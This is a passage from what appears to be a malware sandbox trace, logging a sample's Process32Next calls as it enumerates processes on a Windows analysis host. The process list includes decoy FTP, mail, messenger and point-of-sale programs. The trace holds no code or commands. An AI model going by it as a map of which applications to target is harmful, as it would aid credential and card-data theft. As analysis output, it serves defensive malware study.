pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.268] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.270] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.272] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.274] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0278.276] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0278.282] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0278.284] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.286] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0278.287] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0278.289] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0278.291] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0278.348] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0278.351] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0278.352] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0278.354] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.360] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.363] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0278.365] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0278.367] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0278.370] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0278.375] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0278.377] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0278.379] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0278.381] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0278.383] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0278.385] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0278.441] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0278.443] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0278.445] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0278.447] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0278.455] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0278.457] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0278.459] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0278.461] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0278.463] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0278.563] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0278.565] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0278.566] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0278.568] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0278.570] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0278.571] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0278.573] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0278.578] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0278.580] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0278.582] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0278.584] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0278.586] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0278.588] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0278.639] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0278.641] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0278.643] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0278.644] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0278.646] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0278.648] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0278.649] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0278.651] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0278.656] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0278.658] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0278.659] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0278.661] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0278.663] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0278.664] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0278.666] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0278.668] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0278.673] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0278.674] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0278.676] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0278.678] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0278.679] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0278.681] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0278.683] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0278.740] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0278.743] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0278.745] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0278.750] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0278.751] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0278.753] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0278.754] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0278.756] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0278.757] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0278.759] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0278.760] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0278.764] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, 